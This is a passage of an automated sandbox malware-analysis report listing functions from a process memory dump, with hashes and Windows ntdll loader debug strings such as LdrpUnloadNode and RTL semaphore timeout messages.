                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: $File
                                                      • API String ID: 3446177414-2412145507
                                                      • Opcode ID: b993b30af9484cc79df55cf00b2c416bdfbfe0d52eb7987f52c0993d07728fd7
                                                      • Instruction ID: 68f279b6b83300b14f5b0e8fe40776f101b70dacaf290eeeadf7d46a94b658ab
                                                      • Opcode Fuzzy Hash: b993b30af9484cc79df55cf00b2c416bdfbfe0d52eb7987f52c0993d07728fd7
                                                      • Instruction Fuzzy Hash: 2561DF71A1021CABEB26CF28CC41FEDB7B9AB18710F4045E9E509E6191DB70AF84CF51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 3446177414-2283098728
                                                      • Opcode ID: b4cb6b1df276b8468575c93986daca8d17d038ea1db601f5a96191be591ea2ef
                                                      • Instruction ID: 9cc4dce6c1240bd0c79da7ec76c2f652a391f5993181a3ba101ef3c69f132194
                                                      • Opcode Fuzzy Hash: b4cb6b1df276b8468575c93986daca8d17d038ea1db601f5a96191be591ea2ef
                                                      • Instruction Fuzzy Hash: EF5107B17003019FE710DF28D884B2977E5BFA4335F14066DE465A7290EF35A886DF92
                                                      APIs
                                                      Strings
                                                      • Failed to reallocate the system dirs string !, xrefs: 378782D7
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 378782DE
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 378782E8
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 3446177414-1783798831
                                                      • Opcode ID: 5de7f835e6db6202ec8c44bbd8d202af3909870fef9bc4a3a917440398dcf84d
                                                      • Instruction ID: 84cb0e46ff65341f883a6359e38f30b90eabe9d8188a7ffcf83d3100bc3fa91f
                                                      • Opcode Fuzzy Hash: 5de7f835e6db6202ec8c44bbd8d202af3909870fef9bc4a3a917440398dcf84d
                                                      • Instruction Fuzzy Hash: 2041D3B9645304ABE710DF6CDC45F5B7BE8AF64661F00492AF854E7290EB38E801CF92
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 37877B7F
                                                      • RTL: Resource at %p, xrefs: 37877B8E
                                                      • RTL: Re-Waiting, xrefs: 37877BAC
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: e12474796f84c596e00a62df308f41273905f3d1afe046a7b347cdcf632e174e
                                                      • Instruction ID: f3614020134abf2bb47f7724e8c246527c13ea9ae1e3ef816ea7779997585112
                                                      • Opcode Fuzzy Hash: e12474796f84c596e00a62df308f41273905f3d1afe046a7b347cdcf632e174e
                                                      • Instruction Fuzzy Hash: 0A41B3797057469FE710CE2DC840B56BBE5EFA8720F100A1DE95A9B680DB31E805CF92
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3787728C
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 378772A3
                                                      • RTL: Re-Waiting, xrefs: 378772C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 37877294
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 91f52408c0c4559ef245f8b971735181572225a12761c90a09de738061eae66e
                                                      • Instruction ID: 6ecbcc766061a3744501dbd73c797f71367f1542b69741986f1d440ccaefc65e
                                                      • Opcode Fuzzy Hash: 91f52408c0c4559ef245f8b971735181572225a12761c90a09de738061eae66e
                                                      • Instruction Fuzzy Hash: 1141D079701246ABE710CE29CC41F56BBA5FFA4760F100A1DF966EB240DB21E856CBD2
                                                      APIs
                                                      Strings
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37884888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 37884899
                                                      • LdrpCheckRedirection, xrefs: 3788488F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 3446177414-3154609507
                                                      • Opcode ID: 3e421c20a21825143568be0f604b11d8535c3958becd7b7a4c7133637bb57e48
                                                      • Instruction ID: 6e4913941cb9bc54b8233e354291de89bd9026371ea56b53fe4ed62d536ec7c3
                                                      • Opcode Fuzzy Hash: 3e421c20a21825143568be0f604b11d8535c3958becd7b7a4c7133637bb57e48
                                                      • Instruction Fuzzy Hash: 8A41CF77A00755AFDB11DE68D940B167BE4AF697A0F020669EC5CEB311EB35E800CB91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 6de2c90989f209e0338bacdd991bd019cdc20756230c077b16281e1056b14731
                                                      • Instruction ID: bb5501c06d239fe56363dd094494d8db7800ea97a0141ce0b189bc50c392fce5
                                                      • Opcode Fuzzy Hash: 6de2c90989f209e0338bacdd991bd019cdc20756230c077b16281e1056b14731
                                                      • Instruction Fuzzy Hash: E5318476A002199FDB20DF2CCC40BEE77F8EF58750F800556E859E3200EB34AA498FA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: Wow64 Emulation Layer
                                                      • API String ID: 3446177414-921169906
                                                      • Opcode ID: 4901a9705c423bfe9cfd05d56ef79c86a16e1272fd90276c1929b08f6ffb16ef
                                                      • Instruction ID: f73b4114727d305e39a8ff88b82e9d31448c313c3fad00232b130ad65f59fc6b
                                                      • Opcode Fuzzy Hash: 4901a9705c423bfe9cfd05d56ef79c86a16e1272fd90276c1929b08f6ffb16ef
                                                      • Instruction Fuzzy Hash: 15216A76A0012DBFAB019BA4CC98DBF7B7DEF552D8B014064FA11A6100E738AE16DF21
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: a41faa8f13e4fa0f6176f1a2dca28673f662d0472305e41d754f54804d574083
                                                      • Instruction ID: 772265e32187558d55234ba9503d4978f1d8e5b8bb0c968a70bebaf239a0d98f
                                                      • Opcode Fuzzy Hash: a41faa8f13e4fa0f6176f1a2dca28673f662d0472305e41d754f54804d574083
                                                      • Instruction Fuzzy Hash: FDE16D71E00309AFEF15CFA4C885BEEBBB4BF18354F10852AE515EB290D774AA45CB50
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6d0fa062f3dceae643e297e58a73ef1b82abd500d72e671a06e1a92e4054de3
                                                      • Instruction ID: a03d4abdf4c26f7b2fc3bc364a54122fc1a3240030f5aef944a260134ac5cf71
                                                      • Opcode Fuzzy Hash: d6d0fa062f3dceae643e297e58a73ef1b82abd500d72e671a06e1a92e4054de3
                                                      • Instruction Fuzzy Hash: FDE12174E00708DFDB21CFA9C980A9DBBF1FF68325F60456AE556A7260DB34A881DF10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: 179e5640c8ff5e2a6a9cc940ab1fc6763b6ec89d1a0f1dcd0e6cbeb6e0474191
                                                      • Instruction ID: 0e4495521ce4273a1b0ba429cd76a7fd61b2d78df88d99d4b97f1d8b7fd2c565
                                                      • Opcode Fuzzy Hash: 179e5640c8ff5e2a6a9cc940ab1fc6763b6ec89d1a0f1dcd0e6cbeb6e0474191
                                                      • Instruction Fuzzy Hash: 60713471E00259DFEF01CFA9D980B9DBBB5BF58350F44406AE916EB250D734A906CFA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: bf792503fe36f8fb07480a237f687c995cbef975abcf1b24474919577b17b96c
                                                      • Instruction ID: 03db714c266c2e90b4b30e71de92dd81fc30df6364831e6f3452719a96fab787
                                                      • Opcode Fuzzy Hash: bf792503fe36f8fb07480a237f687c995cbef975abcf1b24474919577b17b96c
                                                      • Instruction Fuzzy Hash: BE515979700A169FEB08CE9CD4E5AA977F1BBA8360B244169D906DB710DB74FC41CB82
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: 11b6fc4e6de69156c92d34e64b6bb920e4ff6101bec28643f0574b3954b2a2d2
                                                      • Instruction ID: dd1483eb92ec9c621b8e01e135af88f3ec05e2ff4dca543d843cc62202d13f60
                                                      • Opcode Fuzzy Hash: 11b6fc4e6de69156c92d34e64b6bb920e4ff6101bec28643f0574b3954b2a2d2
                                                      • Instruction Fuzzy Hash: 445125B5E00259DFDF04CF9AD841ADDBBB1BF58364F15802AE826BB250D738A942CF50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                      • String ID:
                                                      • API String ID: 4281723722-0
                                                      • Opcode ID: 71624766565416d8dff506f21f24f634570448ac025bea65133d2e4ef5283e28
                                                      • Instruction ID: 366fc119ec4dc6fc83c48717cc094370237c9f2553eae7e7a1e48a3e1f262541
                                                      • Opcode Fuzzy Hash: 71624766565416d8dff506f21f24f634570448ac025bea65133d2e4ef5283e28
                                                      • Instruction Fuzzy Hash: 383112B5E416189FCF11EFA8E885B9DBBB0BF58720F10412AE425F7290DB395901CF54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 5c4ee987e388c1a6f04a0e6bd003ecdb6b932b5247576467156a06da6656beba
                                                      • Instruction ID: ff089a8abf45a7afd72ba3b28a12d343ef818d4fc9affb7e725dffc3615312ee
                                                      • Opcode Fuzzy Hash: 5c4ee987e388c1a6f04a0e6bd003ecdb6b932b5247576467156a06da6656beba
                                                      • Instruction Fuzzy Hash: F33239B4E05369EFEB21CF64CC44BD9BBB0BB28314F0041E9D559A7241DBB49A84CFA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 526bdbd3c5b4fa79fc9ad3db4526a1191de351bdfcf8554d8a5d791ed6208f0b
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 13919174E0021E9EEB10CF69C880BAEB7E5BF64770F50461EE864A72C4EBB499408B51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$Flst
                                                      • API String ID: 0-758220159
                                                      • Opcode ID: 2ec03f812ab499926dc32b58c990f388b90e4d9cbd980d7b90e66ae91b81edb6
                                                      • Instruction ID: c185c44297542496d46bfab767602b2faa4a29415823e1b20914873abc9b298f
                                                      • Opcode Fuzzy Hash: 2ec03f812ab499926dc32b58c990f388b90e4d9cbd980d7b90e66ae91b81edb6
                                                      • Instruction Fuzzy Hash: D4519FB9E022488FEB14CF99C488769FBF4EF643A4F54806AD04DDB651EB70D985CB81
                                                      APIs
                                                      Strings
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3780063D
                                                      • kLsE, xrefs: 37800540
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 3446177414-2547482624
                                                      • Opcode ID: f229af2e686363ed65664195af53b73180b8ddaf45c5c2fe3e6e581434c8cb31
                                                      • Instruction ID: 6b947049e1c30779297eee21283585b829a4cafaf1ca61dbb5e8ba617967890a
                                                      • Opcode Fuzzy Hash: f229af2e686363ed65664195af53b73180b8ddaf45c5c2fe3e6e581434c8cb31
                                                      • Instruction Fuzzy Hash: C651CFB960474AAFD324DF68C8406A7B7E5AF94324F00893EE9E9C7240E774E545CF92
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 3788CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 122fc58f9ea3723cf7035cb25f62a9b54efd8b24579714ea75dccc633dd584a3
                                                      • Instruction ID: 3ce343344a3de210975699533876c9afaa06577fdc9a5e74c595d3ffed50d2c2
                                                      • Opcode Fuzzy Hash: 122fc58f9ea3723cf7035cb25f62a9b54efd8b24579714ea75dccc633dd584a3
                                                      • Instruction Fuzzy Hash: A441A0B6900218EFDB119FA9D840A6DBBF8FF69714F00416AE924EB254D738D801CF62
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: 0$0
                                                      • API String ID: 3446177414-203156872
                                                      • Opcode ID: 20b5141fb991b4b80fff87adb9d7839140023693b33718553c462e6b353b57f8
                                                      • Instruction ID: 48be2cdc1183e12094d290c32ab1a10f96c1905f6efe8b74b51a6c270761945d
                                                      • Opcode Fuzzy Hash: 20b5141fb991b4b80fff87adb9d7839140023693b33718553c462e6b353b57f8
                                                      • Instruction Fuzzy Hash: 7B415BB56087059FD300CF28C594A56BBE5BF88354F04492EF888DB340D776E906CF96